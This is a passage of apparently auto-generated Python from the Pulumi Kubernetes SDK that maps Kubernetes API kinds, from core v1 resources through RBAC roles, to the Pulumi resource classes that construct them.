from pulumi_kubernetes.core.v1 import LimitRange
return [identifier.apply(
lambda x: (f"v1/LimitRange:{x}",
LimitRange(f"{x}", opts, **obj)))]
if gvk == "v1/LimitRangeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import LimitRangeList
return [identifier.apply(
lambda x: (f"v1/LimitRangeList:{x}",
LimitRangeList(f"{x}", opts, **obj)))]
if gvk == "v1/Namespace":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Namespace
return [identifier.apply(
lambda x: (f"v1/Namespace:{x}",
Namespace(f"{x}", opts, **obj)))]
if gvk == "v1/NamespaceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import NamespaceList
return [identifier.apply(
lambda x: (f"v1/NamespaceList:{x}",
NamespaceList(f"{x}", opts, **obj)))]
if gvk == "v1/Node":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Node
return [identifier.apply(
lambda x: (f"v1/Node:{x}",
Node(f"{x}", opts, **obj)))]
if gvk == "v1/NodeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import NodeList
return [identifier.apply(
lambda x: (f"v1/NodeList:{x}",
NodeList(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolume":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolume
return [identifier.apply(
lambda x: (f"v1/PersistentVolume:{x}",
PersistentVolume(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolumeClaim":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolumeClaim
return [identifier.apply(
lambda x: (f"v1/PersistentVolumeClaim:{x}",
PersistentVolumeClaim(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolumeClaimList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolumeClaimList
return [identifier.apply(
lambda x: (f"v1/PersistentVolumeClaimList:{x}",
PersistentVolumeClaimList(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolumeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolumeList
return [identifier.apply(
lambda x: (f"v1/PersistentVolumeList:{x}",
PersistentVolumeList(f"{x}", opts, **obj)))]
if gvk == "v1/Pod":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Pod
return [identifier.apply(
lambda x: (f"v1/Pod:{x}",
Pod(f"{x}", opts, **obj)))]
if gvk == "v1/PodList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PodList
return [identifier.apply(
lambda x: (f"v1/PodList:{x}",
PodList(f"{x}", opts, **obj)))]
if gvk == "v1/PodTemplate":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PodTemplate
return [identifier.apply(
lambda x: (f"v1/PodTemplate:{x}",
PodTemplate(f"{x}", opts, **obj)))]
if gvk == "v1/PodTemplateList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PodTemplateList
return [identifier.apply(
lambda x: (f"v1/PodTemplateList:{x}",
PodTemplateList(f"{x}", opts, **obj)))]
if gvk == "v1/ReplicationController":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ReplicationController
return [identifier.apply(
lambda x: (f"v1/ReplicationController:{x}",
ReplicationController(f"{x}", opts, **obj)))]
if gvk == "v1/ReplicationControllerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ReplicationControllerList
return [identifier.apply(
lambda x: (f"v1/ReplicationControllerList:{x}",
ReplicationControllerList(f"{x}", opts, **obj)))]
if gvk == "v1/ResourceQuota":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ResourceQuota
return [identifier.apply(
lambda x: (f"v1/ResourceQuota:{x}",
ResourceQuota(f"{x}", opts, **obj)))]
if gvk == "v1/ResourceQuotaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ResourceQuotaList
return [identifier.apply(
lambda x: (f"v1/ResourceQuotaList:{x}",
ResourceQuotaList(f"{x}", opts, **obj)))]
if gvk == "v1/Secret":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Secret
return [identifier.apply(
lambda x: (f"v1/Secret:{x}",
Secret(f"{x}", opts, **obj)))]
if gvk == "v1/SecretList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import SecretList
return [identifier.apply(
lambda x: (f"v1/SecretList:{x}",
SecretList(f"{x}", opts, **obj)))]
if gvk == "v1/Service":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Service
return [identifier.apply(
lambda x: (f"v1/Service:{x}",
Service(f"{x}", opts, **obj)))]
if gvk == "v1/ServiceAccount":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ServiceAccount
return [identifier.apply(
lambda x: (f"v1/ServiceAccount:{x}",
ServiceAccount(f"{x}", opts, **obj)))]
if gvk == "v1/ServiceAccountList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ServiceAccountList
return [identifier.apply(
lambda x: (f"v1/ServiceAccountList:{x}",
ServiceAccountList(f"{x}", opts, **obj)))]
if gvk == "v1/ServiceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ServiceList
return [identifier.apply(
lambda x: (f"v1/ServiceList:{x}",
ServiceList(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1/EndpointSlice":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1 import EndpointSlice
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1/EndpointSlice:{x}",
EndpointSlice(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1/EndpointSliceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1 import EndpointSliceList
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1/EndpointSliceList:{x}",
EndpointSliceList(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1beta1/EndpointSlice":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1beta1 import EndpointSlice
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1beta1/EndpointSlice:{x}",
EndpointSlice(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1beta1/EndpointSliceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1beta1 import EndpointSliceList
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1beta1/EndpointSliceList:{x}",
EndpointSliceList(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1/Event":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1 import Event
return [identifier.apply(
lambda x: (f"events.k8s.io/v1/Event:{x}",
Event(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1/EventList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1 import EventList
return [identifier.apply(
lambda x: (f"events.k8s.io/v1/EventList:{x}",
EventList(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1beta1/Event":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1beta1 import Event
return [identifier.apply(
lambda x: (f"events.k8s.io/v1beta1/Event:{x}",
Event(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1beta1/EventList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1beta1 import EventList
return [identifier.apply(
lambda x: (f"events.k8s.io/v1beta1/EventList:{x}",
EventList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/DaemonSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import DaemonSet
return [identifier.apply(
lambda x: (f"extensions/v1beta1/DaemonSet:{x}",
DaemonSet(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/DaemonSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import DaemonSetList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/DaemonSetList:{x}",
DaemonSetList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import Deployment
return [identifier.apply(
lambda x: (f"extensions/v1beta1/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import DeploymentList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/Ingress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import Ingress
return [identifier.apply(
lambda x: (f"extensions/v1beta1/Ingress:{x}",
Ingress(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/IngressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import IngressList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/IngressList:{x}",
IngressList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/NetworkPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import NetworkPolicy
return [identifier.apply(
lambda x: (f"extensions/v1beta1/NetworkPolicy:{x}",
NetworkPolicy(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/NetworkPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import NetworkPolicyList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/NetworkPolicyList:{x}",
NetworkPolicyList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/PodSecurityPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import PodSecurityPolicy
return [identifier.apply(
lambda x: (f"extensions/v1beta1/PodSecurityPolicy:{x}",
PodSecurityPolicy(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/PodSecurityPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import PodSecurityPolicyList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/PodSecurityPolicyList:{x}",
PodSecurityPolicyList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/ReplicaSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import ReplicaSet
return [identifier.apply(
lambda x: (f"extensions/v1beta1/ReplicaSet:{x}",
ReplicaSet(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/ReplicaSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import ReplicaSetList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/ReplicaSetList:{x}",
ReplicaSetList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import PriorityLevelConfigurationList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import PriorityLevelConfigurationList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import PriorityLevelConfigurationList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import PriorityLevelConfigurationList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "meta/v1/Status":
# Import locally to avoid name collisions.
from pulumi_kubernetes.meta.v1 import Status
return [identifier.apply(
lambda x: (f"meta/v1/Status:{x}",
Status(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/Ingress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import Ingress
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/Ingress:{x}",
Ingress(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/IngressClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import IngressClass
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/IngressClass:{x}",
IngressClass(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/IngressClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import IngressClassList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/IngressClassList:{x}",
IngressClassList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/IngressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import IngressList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/IngressList:{x}",
IngressList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/NetworkPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import NetworkPolicy
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/NetworkPolicy:{x}",
NetworkPolicy(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/NetworkPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import NetworkPolicyList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/NetworkPolicyList:{x}",
NetworkPolicyList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/ClusterCIDR":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import ClusterCIDR
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/ClusterCIDR:{x}",
ClusterCIDR(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/ClusterCIDRList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import ClusterCIDRList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/ClusterCIDRList:{x}",
ClusterCIDRList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/IPAddress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import IPAddress
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/IPAddress:{x}",
IPAddress(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/IPAddressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import IPAddressList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/IPAddressList:{x}",
IPAddressList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/Ingress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import Ingress
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/Ingress:{x}",
Ingress(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/IngressClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import IngressClass
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/IngressClass:{x}",
IngressClass(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/IngressClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import IngressClassList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/IngressClassList:{x}",
IngressClassList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/IngressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import IngressList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/IngressList:{x}",
IngressList(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1/RuntimeClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1 import RuntimeClass
return [identifier.apply(
lambda x: (f"node.k8s.io/v1/RuntimeClass:{x}",
RuntimeClass(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1/RuntimeClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1 import RuntimeClassList
return [identifier.apply(
lambda x: (f"node.k8s.io/v1/RuntimeClassList:{x}",
RuntimeClassList(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1alpha1/RuntimeClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1alpha1 import RuntimeClass
return [identifier.apply(
lambda x: (f"node.k8s.io/v1alpha1/RuntimeClass:{x}",
RuntimeClass(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1alpha1/RuntimeClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1alpha1 import RuntimeClassList
return [identifier.apply(
lambda x: (f"node.k8s.io/v1alpha1/RuntimeClassList:{x}",
RuntimeClassList(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1beta1/RuntimeClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1beta1 import RuntimeClass
return [identifier.apply(
lambda x: (f"node.k8s.io/v1beta1/RuntimeClass:{x}",
RuntimeClass(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1beta1/RuntimeClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1beta1 import RuntimeClassList
return [identifier.apply(
lambda x: (f"node.k8s.io/v1beta1/RuntimeClassList:{x}",
RuntimeClassList(f"{x}", opts, **obj)))]
if gvk == "policy/v1/PodDisruptionBudget":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1 import PodDisruptionBudget
return [identifier.apply(
lambda x: (f"policy/v1/PodDisruptionBudget:{x}",
PodDisruptionBudget(f"{x}", opts, **obj)))]
if gvk == "policy/v1/PodDisruptionBudgetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1 import PodDisruptionBudgetList
return [identifier.apply(
lambda x: (f"policy/v1/PodDisruptionBudgetList:{x}",
PodDisruptionBudgetList(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodDisruptionBudget":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodDisruptionBudget
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodDisruptionBudget:{x}",
PodDisruptionBudget(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodDisruptionBudgetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodDisruptionBudgetList
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodDisruptionBudgetList:{x}",
PodDisruptionBudgetList(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodSecurityPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodSecurityPolicy
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodSecurityPolicy:{x}",
PodSecurityPolicy(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodSecurityPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodSecurityPolicyList
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodSecurityPolicyList:{x}",
PodSecurityPolicyList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRole":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRole
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRole:{x}",
ClusterRole(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRoleBinding:{x}",
ClusterRoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRoleBindingList:{x}",
ClusterRoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRoleList:{x}",
ClusterRoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/Role":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import Role
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/Role:{x}",
Role(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/RoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import RoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/RoleBinding:{x}",
RoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/RoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import RoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/RoleBindingList:{x}",
RoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/RoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import RoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/RoleList:{x}",
RoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRole":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRole
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRole:{x}",
ClusterRole(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRoleBinding:{x}",
ClusterRoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRoleBindingList:{x}",
ClusterRoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRoleList:{x}",
ClusterRoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/Role":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import Role
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/Role:{x}",
Role(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/RoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import RoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/RoleBinding:{x}",
RoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/RoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import RoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/RoleBindingList:{x}",
RoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/RoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import RoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/RoleList:{x}",
RoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRole":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import ClusterRole
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRole:{x}",
ClusterRole(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import ClusterRoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRoleBinding:{x}",
ClusterRoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import ClusterRoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRoleBindingList:{x}",
ClusterRoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRoleList":
# Import locally to avoid name collisions.
